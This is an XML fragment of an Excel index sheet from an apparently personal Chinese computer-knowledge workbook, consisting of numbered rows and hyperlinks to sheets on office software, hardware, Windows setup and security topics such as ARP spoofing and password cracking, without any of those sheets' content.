    <row r="26" spans="1:3" hidden="1">
      <c r="A26" s="2">
        <v>24</v>
      </c>
      <c r="B26" t="s">
        <v>5815</v>
      </c>
      <c r="C26" s="3" t="s">
        <v>4300</v>
      </c>
    </row>
    <row r="27" spans="1:3" hidden="1">
      <c r="A27" s="2">
        <v>25</v>
      </c>
      <c r="B27" t="s">
        <v>5815</v>
      </c>
      <c r="C27" s="3" t="s">
        <v>3501</v>
      </c>
    </row>
    <row r="28" spans="1:3">
      <c r="A28" s="2">
        <v>26</v>
      </c>
      <c r="B28" s="3" t="s">
        <v>5914</v>
      </c>
      <c r="C28" s="3" t="s">
        <v>3366</v>
      </c>
    </row>
    <row r="29" spans="1:3">
      <c r="A29" s="2">
        <v>110</v>
      </c>
      <c r="B29" t="s">
        <v>5909</v>
      </c>
      <c r="C29" s="3" t="s">
        <v>5910</v>
      </c>
    </row>
    <row r="30" spans="1:3">
      <c r="A30" s="2">
        <v>27</v>
      </c>
      <c r="B30" t="s">
        <v>3339</v>
      </c>
      <c r="C30" s="3" t="s">
        <v>3338</v>
      </c>
    </row>
    <row r="31" spans="1:3">
      <c r="A31" s="2">
        <v>28</v>
      </c>
      <c r="B31" t="s">
        <v>3339</v>
      </c>
      <c r="C31" s="3" t="s">
        <v>5751</v>
      </c>
    </row>
    <row r="32" spans="1:3">
      <c r="A32" s="2">
        <v>29</v>
      </c>
      <c r="B32" t="s">
        <v>3339</v>
      </c>
      <c r="C32" s="3" t="s">
        <v>3443</v>
      </c>
    </row>
    <row r="33" spans="1:3">
      <c r="A33" s="2">
        <v>30</v>
      </c>
      <c r="B33" t="s">
        <v>4672</v>
      </c>
      <c r="C33" s="3" t="s">
        <v>4638</v>
      </c>
    </row>
    <row r="34" spans="1:3">
      <c r="A34" s="2">
        <v>31</v>
      </c>
      <c r="B34" t="s">
        <v>3339</v>
      </c>
      <c r="C34" s="3" t="s">
        <v>3368</v>
      </c>
    </row>
    <row r="35" spans="1:3" hidden="1">
      <c r="A35" s="2">
        <v>32</v>
      </c>
      <c r="B35" s="3" t="s">
        <v>921</v>
      </c>
      <c r="C35" s="3" t="s">
        <v>942</v>
      </c>
    </row>
    <row r="36" spans="1:3" hidden="1">
      <c r="A36" s="2">
        <v>33</v>
      </c>
      <c r="B36" t="s">
        <v>921</v>
      </c>
      <c r="C36" s="3" t="s">
        <v>5513</v>
      </c>
    </row>
    <row r="37" spans="1:3" hidden="1">
      <c r="A37" s="2">
        <v>34</v>
      </c>
      <c r="B37" t="s">
        <v>921</v>
      </c>
      <c r="C37" s="3" t="s">
        <v>920</v>
      </c>
    </row>
    <row r="38" spans="1:3" hidden="1">
      <c r="A38" s="2">
        <v>35</v>
      </c>
      <c r="B38" t="s">
        <v>908</v>
      </c>
      <c r="C38" s="3" t="s">
        <v>912</v>
      </c>
    </row>
    <row r="39" spans="1:3" hidden="1">
      <c r="A39" s="2">
        <v>36</v>
      </c>
      <c r="B39" t="s">
        <v>5495</v>
      </c>
      <c r="C39" s="3" t="s">
        <v>5493</v>
      </c>
    </row>
    <row r="40" spans="1:3" hidden="1">
      <c r="A40" s="2">
        <v>37</v>
      </c>
      <c r="B40" t="s">
        <v>4222</v>
      </c>
      <c r="C40" s="3" t="s">
        <v>3491</v>
      </c>
    </row>
    <row r="41" spans="1:3" hidden="1">
      <c r="A41" s="2">
        <v>38</v>
      </c>
      <c r="B41" t="s">
        <v>921</v>
      </c>
      <c r="C41" s="3" t="s">
        <v>925</v>
      </c>
    </row>
    <row r="42" spans="1:3" hidden="1">
      <c r="A42" s="2">
        <v>39</v>
      </c>
      <c r="B42" t="s">
        <v>773</v>
      </c>
      <c r="C42" s="3" t="s">
        <v>883</v>
      </c>
    </row>
    <row r="43" spans="1:3" hidden="1">
      <c r="A43" s="2">
        <v>40</v>
      </c>
      <c r="B43" t="s">
        <v>773</v>
      </c>
      <c r="C43" s="3" t="s">
        <v>751</v>
      </c>
    </row>
    <row r="44" spans="1:3" hidden="1">
      <c r="A44" s="2">
        <v>41</v>
      </c>
      <c r="B44" t="s">
        <v>773</v>
      </c>
      <c r="C44" s="3" t="s">
        <v>4807</v>
      </c>
    </row>
    <row r="45" spans="1:3" hidden="1">
      <c r="A45" s="2">
        <v>42</v>
      </c>
      <c r="B45" t="s">
        <v>773</v>
      </c>
      <c r="C45" s="3" t="s">
        <v>867</v>
      </c>
    </row>
    <row r="46" spans="1:3" hidden="1">
      <c r="A46" s="2">
        <v>43</v>
      </c>
      <c r="B46" t="s">
        <v>773</v>
      </c>
      <c r="C46" s="3" t="s">
        <v>3772</v>
      </c>
    </row>
    <row r="47" spans="1:3" hidden="1">
      <c r="A47" s="2">
        <v>44</v>
      </c>
      <c r="B47" t="s">
        <v>994</v>
      </c>
      <c r="C47" s="3" t="s">
        <v>993</v>
      </c>
    </row>
    <row r="48" spans="1:3" hidden="1">
      <c r="A48" s="2">
        <v>109</v>
      </c>
      <c r="B48" t="s">
        <v>5881</v>
      </c>
      <c r="C48" s="3" t="s">
        <v>5879</v>
      </c>
    </row>
    <row r="49" spans="1:3" hidden="1">
      <c r="A49" s="2">
        <v>45</v>
      </c>
      <c r="B49" s="3" t="s">
        <v>5913</v>
      </c>
      <c r="C49" s="304" t="s">
        <v>4777</v>
      </c>
    </row>
    <row r="50" spans="1:3" hidden="1">
      <c r="A50" s="2">
        <v>46</v>
      </c>
      <c r="B50" t="s">
        <v>5817</v>
      </c>
      <c r="C50" s="3" t="s">
        <v>4778</v>
      </c>
    </row>
    <row r="51" spans="1:3" hidden="1">
      <c r="A51" s="2">
        <v>47</v>
      </c>
      <c r="B51" t="s">
        <v>5817</v>
      </c>
      <c r="C51" s="3" t="s">
        <v>4441</v>
      </c>
    </row>
    <row r="52" spans="1:3" hidden="1">
      <c r="A52" s="2">
        <v>48</v>
      </c>
      <c r="B52" t="s">
        <v>5817</v>
      </c>
      <c r="C52" s="12" t="s">
        <v>241</v>
      </c>
    </row>
    <row r="53" spans="1:3" hidden="1">
      <c r="A53" s="2">
        <v>49</v>
      </c>
      <c r="B53" t="s">
        <v>5817</v>
      </c>
      <c r="C53" s="3" t="s">
        <v>2899</v>
      </c>
    </row>
    <row r="54" spans="1:3" hidden="1">
      <c r="A54" s="2">
        <v>50</v>
      </c>
      <c r="B54" t="s">
        <v>5817</v>
      </c>
      <c r="C54" s="3" t="s">
        <v>3116</v>
      </c>
    </row>
    <row r="55" spans="1:3" hidden="1">
      <c r="A55" s="2">
        <v>51</v>
      </c>
      <c r="B55" t="s">
        <v>5817</v>
      </c>
      <c r="C55" s="3" t="s">
        <v>5321</v>
      </c>
    </row>
    <row r="56" spans="1:3" hidden="1">
      <c r="A56" s="2">
        <v>52</v>
      </c>
      <c r="B56" t="s">
        <v>5817</v>
      </c>
      <c r="C56" s="3" t="s">
        <v>5177</v>
      </c>
    </row>
    <row r="57" spans="1:3" hidden="1">
      <c r="A57" s="2">
        <v>53</v>
      </c>
      <c r="B57" t="s">
        <v>5817</v>
      </c>
      <c r="C57" s="3" t="s">
        <v>3272</v>
      </c>
    </row>
    <row r="58" spans="1:3" hidden="1">
      <c r="A58" s="2">
        <v>54</v>
      </c>
      <c r="B58" t="s">
        <v>5817</v>
      </c>
      <c r="C58" s="3" t="s">
        <v>907</v>
      </c>
    </row>
    <row r="59" spans="1:3" hidden="1">
      <c r="A59" s="2">
        <v>55</v>
      </c>
      <c r="B59" t="s">
        <v>4512</v>
      </c>
      <c r="C59" s="3" t="s">
        <v>1097</v>
      </c>
    </row>
    <row r="60" spans="1:3" hidden="1">
      <c r="A60" s="2">
        <v>56</v>
      </c>
      <c r="B60" t="s">
        <v>4512</v>
      </c>
      <c r="C60" s="3" t="s">
        <v>4613</v>
      </c>
    </row>
    <row r="61" spans="1:3" hidden="1">
      <c r="A61" s="2">
        <v>57</v>
      </c>
      <c r="B61" t="s">
        <v>4512</v>
      </c>
      <c r="C61" s="3" t="s">
        <v>3689</v>
      </c>
    </row>
    <row r="62" spans="1:3" hidden="1">
      <c r="A62" s="2">
        <v>58</v>
      </c>
      <c r="B62" t="s">
        <v>4512</v>
      </c>
      <c r="C62" s="3" t="s">
        <v>4513</v>
      </c>
    </row>
    <row r="63" spans="1:3" hidden="1">
      <c r="A63" s="2">
        <v>59</v>
      </c>
      <c r="B63" t="s">
        <v>4512</v>
      </c>
      <c r="C63" s="3" t="s">
        <v>4572</v>
      </c>
    </row>
    <row r="64" spans="1:3" hidden="1">
      <c r="A64" s="2">
        <v>60</v>
      </c>
      <c r="B64" t="s">
        <v>4512</v>
      </c>
      <c r="C64" s="3" t="s">
        <v>2912</v>
      </c>
    </row>
    <row r="65" spans="1:6" hidden="1">
      <c r="A65" s="2">
        <v>61</v>
      </c>
      <c r="B65" t="s">
        <v>4512</v>
      </c>
      <c r="C65" s="3" t="s">
        <v>4504</v>
      </c>
    </row>
    <row r="66" spans="1:6" hidden="1">
      <c r="A66" s="2">
        <v>62</v>
      </c>
      <c r="B66" t="s">
        <v>4512</v>
      </c>
      <c r="C66" s="3" t="s">
        <v>4729</v>
      </c>
      <c r="F66" t="s">
        <v>4739</v>
      </c>
    </row>
    <row r="67" spans="1:6" hidden="1">
      <c r="A67" s="2">
        <v>63</v>
      </c>
      <c r="B67" t="s">
        <v>4512</v>
      </c>
      <c r="C67" s="3" t="s">
        <v>4539</v>
      </c>
    </row>
    <row r="68" spans="1:6" hidden="1">
      <c r="A68" s="2">
        <v>64</v>
      </c>
      <c r="B68" t="s">
        <v>4512</v>
      </c>
      <c r="C68" s="3" t="s">
        <v>4570</v>
      </c>
    </row>
    <row r="69" spans="1:6" hidden="1">
      <c r="A69" s="2">
        <v>65</v>
      </c>
      <c r="B69" t="s">
        <v>4512</v>
      </c>
      <c r="C69" s="3" t="s">
        <v>4578</v>
      </c>
    </row>
    <row r="70" spans="1:6" hidden="1">
      <c r="A70" s="2">
        <v>66</v>
      </c>
      <c r="B70" t="s">
        <v>4512</v>
      </c>
      <c r="C70" s="3" t="s">
        <v>3089</v>
      </c>
    </row>
    <row r="71" spans="1:6" hidden="1">
      <c r="A71" s="2">
        <v>67</v>
      </c>
      <c r="B71" t="s">
        <v>4693</v>
      </c>
      <c r="C71" s="3" t="s">
        <v>4673</v>
      </c>
    </row>
    <row r="72" spans="1:6" hidden="1">
      <c r="A72" s="2">
        <v>68</v>
      </c>
      <c r="B72" t="s">
        <v>4512</v>
      </c>
      <c r="C72" s="3" t="s">
        <v>4499</v>
      </c>
    </row>
    <row r="73" spans="1:6" hidden="1">
      <c r="A73" s="2">
        <v>69</v>
      </c>
      <c r="B73" t="s">
        <v>4224</v>
      </c>
      <c r="C73" s="3" t="s">
        <v>4223</v>
      </c>
    </row>
    <row r="74" spans="1:6" hidden="1">
      <c r="A74" s="2">
        <v>70</v>
      </c>
      <c r="B74" t="s">
        <v>12</v>
      </c>
      <c r="C74" s="3" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="75" spans="1:6" hidden="1">
      <c r="A75" s="2">
        <v>71</v>
      </c>
      <c r="B75" t="s">
        <v>5392</v>
      </c>
      <c r="C75" s="3" t="s">
        <v>5388</v>
      </c>
    </row>
    <row r="76" spans="1:6" hidden="1">
      <c r="A76" s="2">
        <v>72</v>
      </c>
      <c r="B76" t="s">
        <v>4233</v>
      </c>
      <c r="C76" s="3" t="s">
        <v>4228</v>
      </c>
    </row>
    <row r="77" spans="1:6" hidden="1">
      <c r="A77" s="2">
        <v>73</v>
      </c>
      <c r="B77" t="s">
        <v>5392</v>
      </c>
      <c r="C77" s="13" t="s">
        <v>5393</v>
      </c>
    </row>
    <row r="78" spans="1:6" hidden="1">
      <c r="A78" s="2">
        <v>74</v>
      </c>
      <c r="B78" t="s">
        <v>4918</v>
      </c>
      <c r="C78" s="3" t="s">
        <v>4916</v>
      </c>
    </row>
    <row r="79" spans="1:6" hidden="1">
      <c r="A79" s="2">
        <v>75</v>
      </c>
      <c r="B79" t="s">
        <v>890</v>
      </c>
      <c r="C79" s="3" t="s">
        <v>93</v>
      </c>
    </row>
    <row r="80" spans="1:6" hidden="1">
      <c r="A80" s="2">
        <v>76</v>
      </c>
      <c r="B80" t="s">
        <v>889</v>
      </c>
      <c r="C80" s="3" t="s">
        <v>3840</v>
      </c>
    </row>
    <row r="81" spans="1:3" hidden="1">
      <c r="A81" s="2">
        <v>77</v>
      </c>
      <c r="B81" t="s">
        <v>4349</v>
      </c>
      <c r="C81" s="3" t="s">
        <v>4347</v>
      </c>
    </row>
    <row r="82" spans="1:3" hidden="1">
      <c r="A82" s="2">
        <v>78</v>
      </c>
      <c r="B82" t="s">
        <v>889</v>
      </c>
      <c r="C82" s="3" t="s">
        <v>4440</v>
      </c>
    </row>
    <row r="83" spans="1:3" hidden="1">
      <c r="A83" s="2">
        <v>79</v>
      </c>
      <c r="B83" t="s">
        <v>889</v>
      </c>
      <c r="C83" s="3" t="s">
        <v>885</v>
      </c>
    </row>
    <row r="84" spans="1:3" hidden="1">
      <c r="A84" s="2">
        <v>80</v>
      </c>
      <c r="B84" t="s">
        <v>889</v>
      </c>
      <c r="C84" s="3" t="s">
        <v>3953</v>
      </c>
    </row>
    <row r="85" spans="1:3" hidden="1">
      <c r="A85" s="2">
        <v>81</v>
      </c>
      <c r="B85" t="s">
        <v>973</v>
      </c>
      <c r="C85" s="3" t="s">
        <v>5795</v>
      </c>
    </row>
    <row r="86" spans="1:3" hidden="1">
      <c r="A86" s="2">
        <v>82</v>
      </c>
      <c r="B86" t="s">
        <v>973</v>
      </c>
      <c r="C86" s="3" t="s">
        <v>5796</v>
      </c>
    </row>
    <row r="87" spans="1:3" hidden="1">
      <c r="A87" s="2">
        <v>83</v>
      </c>
      <c r="B87" t="s">
        <v>973</v>
      </c>
      <c r="C87" s="3" t="s">
        <v>4699</v>
      </c>
    </row>
    <row r="88" spans="1:3" hidden="1">
      <c r="A88" s="2">
        <v>84</v>
      </c>
      <c r="B88" t="s">
        <v>5818</v>
      </c>
      <c r="C88" s="3" t="s">
        <v>4047</v>
      </c>
    </row>
    <row r="89" spans="1:3" hidden="1">
      <c r="A89" s="2">
        <v>85</v>
      </c>
      <c r="B89" t="s">
        <v>973</v>
      </c>
      <c r="C89" s="13" t="s">
        <v>972</v>
      </c>
    </row>
    <row r="90" spans="1:3" hidden="1">
      <c r="A90" s="2">
        <v>86</v>
      </c>
      <c r="B90" t="s">
        <v>973</v>
      </c>
      <c r="C90" s="3" t="s">
        <v>3099</v>
      </c>
    </row>
    <row r="91" spans="1:3" hidden="1">
      <c r="A91" s="2">
        <v>87</v>
      </c>
      <c r="B91" t="s">
        <v>4350</v>
      </c>
      <c r="C91" s="3" t="s">
        <v>4311</v>
      </c>
    </row>
    <row r="92" spans="1:3" hidden="1">
      <c r="A92" s="2">
        <v>88</v>
      </c>
      <c r="B92" t="s">
        <v>987</v>
      </c>
      <c r="C92" s="3" t="s">
        <v>158</v>
      </c>
    </row>
    <row r="93" spans="1:3" hidden="1">
      <c r="A93" s="2">
        <v>89</v>
      </c>
      <c r="B93" t="s">
        <v>987</v>
      </c>
      <c r="C93" s="3" t="s">
        <v>5134</v>
      </c>
    </row>
    <row r="94" spans="1:3" hidden="1">
      <c r="A94" s="2">
        <v>90</v>
      </c>
      <c r="B94" t="s">
        <v>987</v>
      </c>
      <c r="C94" s="3" t="s">
        <v>5167</v>
      </c>
    </row>
    <row r="95" spans="1:3" hidden="1">
      <c r="A95" s="2">
        <v>91</v>
      </c>
      <c r="B95" t="s">
        <v>987</v>
      </c>
      <c r="C95" s="3" t="s">
        <v>5791</v>
      </c>
    </row>
    <row r="96" spans="1:3" hidden="1">
      <c r="A96" s="2">
        <v>92</v>
      </c>
      <c r="B96" t="s">
        <v>5012</v>
      </c>
      <c r="C96" s="3" t="s">
        <v>5792</v>
      </c>
    </row>
    <row r="97" spans="1:3" hidden="1">
      <c r="A97" s="2">
        <v>93</v>
      </c>
      <c r="B97" t="s">
        <v>987</v>
      </c>
      <c r="C97" s="3" t="s">
        <v>5121</v>
      </c>
    </row>
    <row r="98" spans="1:3" hidden="1">
      <c r="A98" s="2">
        <v>94</v>
      </c>
      <c r="B98" t="s">
        <v>987</v>
      </c>
      <c r="C98" s="3" t="s">
        <v>5002</v>
      </c>
    </row>
    <row r="99" spans="1:3" hidden="1">
      <c r="A99" s="2">
        <v>95</v>
      </c>
      <c r="B99" t="s">
        <v>987</v>
      </c>
      <c r="C99" s="3" t="s">
        <v>986</v>
      </c>
    </row>
    <row r="100" spans="1:3" hidden="1">
      <c r="A100" s="2">
        <v>96</v>
      </c>
      <c r="B100" t="s">
        <v>4350</v>
      </c>
      <c r="C100" s="3" t="s">
        <v>4351</v>
      </c>
    </row>
    <row r="101" spans="1:3" hidden="1">
      <c r="A101" s="2">
        <v>97</v>
      </c>
      <c r="B101" t="s">
        <v>987</v>
      </c>
      <c r="C101" s="3" t="s">
        <v>5166</v>
      </c>
    </row>
    <row r="102" spans="1:3" hidden="1">
      <c r="A102" s="2">
        <v>98</v>
      </c>
      <c r="B102" t="s">
        <v>987</v>
      </c>
      <c r="C102" s="3" t="s">
        <v>5410</v>
      </c>
    </row>
    <row r="103" spans="1:3" hidden="1">
      <c r="A103" s="2">
        <v>99</v>
      </c>
      <c r="B103" t="s">
        <v>987</v>
      </c>
      <c r="C103" s="3" t="s">
        <v>5046</v>
      </c>
    </row>
    <row r="104" spans="1:3" hidden="1">
      <c r="A104" s="2">
        <v>100</v>
      </c>
      <c r="B104" t="s">
        <v>987</v>
      </c>
      <c r="C104" s="3" t="s">
        <v>5093</v>
      </c>
    </row>
    <row r="105" spans="1:3" hidden="1">
      <c r="A105" s="2">
        <v>101</v>
      </c>
      <c r="B105" t="s">
        <v>4350</v>
      </c>
      <c r="C105" s="3" t="s">
        <v>4374</v>
      </c>
    </row>
    <row r="106" spans="1:3" hidden="1">
      <c r="A106" s="2">
        <v>102</v>
      </c>
      <c r="B106" t="s">
        <v>3204</v>
      </c>
      <c r="C106" s="3" t="s">
        <v>3203</v>
      </c>
    </row>
    <row r="107" spans="1:3" hidden="1">
      <c r="A107" s="2">
        <v>103</v>
      </c>
      <c r="B107" t="s">
        <v>7</v>
      </c>
      <c r="C107" s="12" t="s">
        <v>74</v>
      </c>
    </row>
    <row r="108" spans="1:3" hidden="1">
      <c r="A108" s="2">
        <v>104</v>
      </c>
      <c r="B108" t="s">
        <v>7</v>
      </c>
      <c r="C108" s="12" t="s">
        <v>75</v>
      </c>
    </row>
    <row r="109" spans="1:3" hidden="1">
      <c r="A109" s="2">
        <v>105</v>
      </c>
      <c r="B109" t="s">
        <v>7</v>
      </c>
      <c r="C109" s="12" t="s">
        <v>69</v>
      </c>
    </row>
    <row r="110" spans="1:3" hidden="1">
      <c r="A110" s="2">
        <v>106</v>
      </c>
      <c r="B110" t="s">
        <v>7</v>
      </c>
      <c r="C110" s="3" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="111" spans="1:3" hidden="1">
      <c r="A111" s="2">
        <v>107</v>
      </c>
      <c r="B111" t="s">
        <v>7</v>
      </c>
      <c r="C111" s="12" t="s">
        <v>76</v>
      </c>
    </row>
    <row r="112" spans="1:3" hidden="1">
      <c r="A112" s="2">
        <v>108</v>
      </c>
      <c r="B112" t="s">
        <v>7</v>
      </c>
      <c r="C112" s="12" t="s">
        <v>68</v>
      </c>
    </row>
    <row r="113" spans="1:3" hidden="1">
      <c r="A113" s="2">
        <v>109</v>
      </c>
      <c r="B113" t="s">
        <v>6198</v>
      </c>
      <c r="C113" s="3" t="s">
        <v>6172</v>
      </c>
    </row>
    <row r="114" spans="1:3" hidden="1">
      <c r="A114" s="2">
        <v>110</v>
      </c>
      <c r="B114" t="s">
        <v>6181</v>
      </c>
      <c r="C114" s="3" t="s">
        <v>6184</v>
      </c>
    </row>
    <row r="115" spans="1:3" hidden="1">
      <c r="A115" s="2">
        <v>111</v>
      </c>
      <c r="B115" t="s">
        <v>5615</v>
      </c>
      <c r="C115" s="3" t="s">
        <v>6190</v>
      </c>
    </row>
    <row r="116" spans="1:3" hidden="1">
      <c r="A116" s="2">
        <v>112</v>
      </c>
      <c r="B116" t="s">
        <v>6242</v>
      </c>
      <c r="C116" s="3" t="s">
        <v>6240</v>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:E116">
    <filterColumn colId="1">
      <filters>
        <filter val="VF"/>
      </filters>
    </filterColumn>
  </autoFilter>
  <sortState ref="A2:G112">
    <sortCondition ref="B2:B112"/>
    <sortCondition ref="C2:C112"/>
  </sortState>
  <phoneticPr fontId="1" type="noConversion"/>
  <hyperlinks>
    <hyperlink ref="C110" location="修改注册表激活Administrator帐户!A1" display="修改注册表激活Administrator帐户"/>
    <hyperlink ref="C74" location="'Internet connection diagram'!A1" display="Internet connection diagram"/>
    <hyperlink ref="C19" location="计算机相关单位!A1" display="计算机相关单位"/>
    <hyperlink ref="E1" location="blank!A1" display="blank"/>
    <hyperlink ref="C112" location="自动登录帐户!A1" display="自动登录帐户"/>
    <hyperlink ref="C109" location="忘记自动登录密码!A1" display="忘记自动登录密码"/>
    <hyperlink ref="C107" location="ABC帐户只能在规定时间内登录!A1" display="ABC帐户只能在规定时间内登录"/>
    <hyperlink ref="C108" location="禁止特定软件在另外一个帐户中运行!A1" display="禁止特定软件在另外一个帐户中运行"/>
    <hyperlink ref="C111" location="帐户基础!A1" display="帐户基础"/>
    <hyperlink ref="C79" location="Windows轻松传送!A1" display="Windows轻松传送"/>
    <hyperlink ref="C92" location="'HP Pavilion dv2623'!A1" display="HP Pavilion dv2623"/>
    <hyperlink ref="C17" location="程序和DLL文件!A1" display="程序和DLL文件"/>
    <hyperlink ref="C21" location="文件夹大小的显示!A1" display="文件夹大小的显示"/>
    <hyperlink ref="C49" location="'Microsoft office'!A1" display="Microsoft office"/>
    <hyperlink ref="C4" location="'WD table cell'!A1" display="WD table cell"/>
    <hyperlink ref="C52" location="'Windows Live 软件包'!A1" display="Windows Live 软件包"/>
    <hyperlink ref="C20" location="计算机英语缩略语!A1" display="计算机英语缩略语"/>
    <hyperlink ref="C50" location="'microsoft visual studio'!A1" display="microsoft visual studio"/>
    <hyperlink ref="C43" location="'Nero Burning ROM多区段DVD刻录'!A1" display="Nero Burning ROM多区段DVD刻录"/>
    <hyperlink ref="C45" location="光盘格式!A1" display="光盘格式其它相关"/>
    <hyperlink ref="C14" location="PC基础知识点!A1" display="PC基础知识点"/>
    <hyperlink ref="C42" location="ISO映像文件操作!A1" display="ISO映像文件操作"/>
    <hyperlink ref="C83" location="系统安装明细!A1" display="系统安装明细"/>
    <hyperlink ref="C58" location="系统小工具!A1" display="系统工具小软件"/>
    <hyperlink ref="C38" location="合并多个word文档!A1" display="合并多个word文档"/>
    <hyperlink ref="C37" location="保护页眉!A1" display="保护页眉"/>
    <hyperlink ref="C41" location="页面布局纵横!A1" display="页面布局纵横"/>
    <hyperlink ref="C35" location="word基础!A1" display="word基础"/>
    <hyperlink ref="C6" location="Excel基础!A1" display="Excel基础"/>
    <hyperlink ref="C86" location="windows系统内容路径!A1" display="windows系统内容路径"/>
    <hyperlink ref="C89" location="计划任务程序!A1" display="计划任务程序"/>
    <hyperlink ref="C99" location="硅胶和导热硅脂!A1" display="硅胶和导热硅脂"/>
    <hyperlink ref="C47" location="如何读取损坏光盘中的文件!A1" display="如何读取损坏光盘中的文件"/>
    <hyperlink ref="C5" location="Excel函数!A1" display="Excel函数"/>
    <hyperlink ref="C59" location="ARP欺骗与防止!A1" display="ARP欺骗与防止"/>
    <hyperlink ref="C87" location="定时开关机!A1" display="定时开关机"/>
    <hyperlink ref="C85" location="windows系统内容!A1" display="windows系统内容"/>
    <hyperlink ref="C53" location="极点五笔!A1" display="极点五笔"/>
    <hyperlink ref="C64" location="计算机十二种常用密码破解法!A1" display="计算机十二种常用密码破解法"/>
    <hyperlink ref="C70" location="系统瘦身和清理!A1" display="系统瘦身和清理"/>
    <hyperlink ref="C90" location="文件关联、默认程序、打开方式!A1" display="文件关联、默认程序、打开方式"/>
    <hyperlink ref="C54" location="'驱动(driver)'!A1" display="驱动(driver)"/>
    <hyperlink ref="C23" location="注册表!A1" display="注册表"/>
    <hyperlink ref="C106" location="主板!A1" display="主板"/>
    <hyperlink ref="C57" location="软件下载、安装、运行、卸载!A1" display="软件下载、安装、运行、卸载"/>
    <hyperlink ref="C30" location="'VFP 6.0文件类型'!A1" display="VFP 6.0文件类型"/>
    <hyperlink ref="C28" location="form!A1" display="form"/>
    <hyperlink ref="C34" location="对象的属性、事件、方法!A1" display="对象的属性、事件、方法"/>
    <hyperlink ref="C31" location="数据的类型!A1" display="数据的类型"/>
    <hyperlink ref="C32" location="VF主程序设计!A1" display="VF主程序设计"/>
    <hyperlink ref="C40" location="实现WORD双面打印的简便方法!A1" display="实现WORD双面打印的简便方法"/>
    <hyperlink ref="C27" location="无敌删除命令!A1" display="无敌删除命令"/>
    <hyperlink ref="C95" location="电脑硬件组装!A1" display="电脑硬件组装"/>
    <hyperlink ref="C61" location="电脑不启动故障诊治全攻略!A1" display="电脑不启动故障诊治全攻略"/>
    <hyperlink ref="C46" location="'快速格式化和普通格式化有什么不同 '!A1" display="快速格式化和普通格式化有什么不同？"/>
    <hyperlink ref="C80" location="XP安装!A1" display="XP安装"/>
    <hyperlink ref="C16" location="常用cmd网络命令的用法!A1" display="常用cmd网络命令的用法"/>
    <hyperlink ref="C84" location="'雨林木风 WinXP SP2 安装'!A1" display="雨林木风 WinXP SP2 安装"/>
    <hyperlink ref="C88" location="黑客必学的六条系统命令!A1" display="黑客必学的六条系统命令"/>
    <hyperlink ref="C73" location="手机里暗藏的十大秘密!A1" display="手机里暗藏的十大秘密"/>
    <hyperlink ref="C76" location="'windows7 宽带自动连接'!A1" display="windows7 宽带自动连接"/>
    <hyperlink ref="C26" location="'恢复win7的quick launch'!A1" display="恢复win7的quick launch"/>
    <hyperlink ref="C91" location="CPU!A1" display="CPU"/>
    <hyperlink ref="C81" location="'可启动光盘 硬盘 恢复盘 启动盘'!A1" display="可启动光盘 硬盘 恢复盘 启动盘"/>
    <hyperlink ref="C105" location="硬盘!A1" display="硬盘"/>
    <hyperlink ref="C82" location="双系统启动顺序!A1" display="双系统启动顺序"/>
    <hyperlink ref="C51" location="MS操作系统各版本介绍!A1" display="MS操作系统各版本介绍"/>
    <hyperlink ref="C72" location="在纯DOS模式下杀毒!A1" display="在纯DOS模式下杀毒"/>
    <hyperlink ref="C65" location="蓝屏并自动分析可能故障原因!A1" display="蓝屏并自动分析可能故障原因"/>
    <hyperlink ref="C62" location="电脑死机原因种种!A1" display="电脑死机原因种种"/>
    <hyperlink ref="C67" location="什么情况下适合修复系统而不是重装!A1" display="什么情况下适合修复系统而不是重装"/>
    <hyperlink ref="C68" location="是否有毒最关注的三大件!A1" display="是否有毒最关注的三大件"/>
    <hyperlink ref="C63" location="防火墙!A1" display="防火墙"/>
    <hyperlink ref="C69" location="网络的安全性!A1" display="网络的安全性"/>
    <hyperlink ref="C60" location="病毒修复、删除、隔离!A1" display="病毒修复、删除、隔离"/>
    <hyperlink ref="C100" location="内存!A1" display="内存"/>
    <hyperlink ref="C15" location="操作系统原理!Print_Titles" display="操作系统原理"/>
    <hyperlink ref="C33" location="程序设计基础!A1" display="程序设计基础"/>
    <hyperlink ref="C71" location="硬盘分区、数据丢失、恢复的经历!A1" display="硬盘分区、数据丢失、恢复的经历"/>
    <hyperlink ref="C66" location="杀毒软件如何辨忠奸!A1" display="杀毒软件如何辨忠奸"/>
    <hyperlink ref="C44" location="打造三合一安装光盘!A1" display="打造三合一安装光盘"/>
    <hyperlink ref="C24" location="'shortcut key'!A1" display="shortcut key"/>
    <hyperlink ref="C12" location="Command!A1" display="Command"/>
    <hyperlink ref="C18" location="低格、高格、快格的区别!A1" display="低格、高格、快格的区别"/>
    <hyperlink ref="C78" location="'远程控制 远程桌面和远程协助'!A1" display="远程控制：远程桌面和远程协助"/>
    <hyperlink ref="C22" location="虚拟virtual!A1" display="虚拟virtual"/>
    <hyperlink ref="C96" location="电脑硬件组装图!A1" display="电脑硬件组装图"/>
    <hyperlink ref="C98" location="光驱!A1" display="光驱"/>
    <hyperlink ref="C103" location="显卡!A1" display="显卡"/>
    <hyperlink ref="C104" location="显示器!A1" display="显示器"/>
    <hyperlink ref="C97" location="复印机!A1" display="复印机"/>
    <hyperlink ref="C93" location="传真机!A1" display="传真机"/>
    <hyperlink ref="C101" location="扫描仪和UPS!A1" display="扫描仪和UPS"/>
    <hyperlink ref="C94" location="打印机!A1" display="打印机"/>
    <hyperlink ref="C56" location="软件是如何被破解的!A1" display="软件是如何被破解的"/>
    <hyperlink ref="C13" location="'DOS、系统提示符、windows PE'!A1" display="DOS、系统提示符、windows PE"/>
    <hyperlink ref="C55" location="软件工具分类!A1" display="软件工具分类"/>
    <hyperlink ref="C25" location="常见故障解决记录与技巧!A1" display="常见故障解决记录与技巧"/>
    <hyperlink ref="C75" location="Modem网络连接!A1" display="Modem网络连接"/>
    <hyperlink ref="C77" location="宽带路由器设置!A1" display="宽带路由器设置"/>
    <hyperlink ref="C102" location="网络硬件!A1" display="网络硬件"/>
    <hyperlink ref="C39" location="将Word变为无所不能的播放器!A1" display="将Word变为无所不能的播放器"/>
    <hyperlink ref="C36" location="word中英文混排的技巧!A1" display="word中英文混排的技巧"/>
    <hyperlink ref="C7" location="数据透视表!A1" display="数据透视表"/>
    <hyperlink ref="C9" location="'～$文档'!A1" display="～$文档 是否导入未保存文档？"/>
    <hyperlink ref="C11" location="丈量字符的尺寸!A1" display="丈量字符的尺寸"/>
    <hyperlink ref="C10" location="'word Excel中的超链接'!A1" display="Excel中的超链接"/>
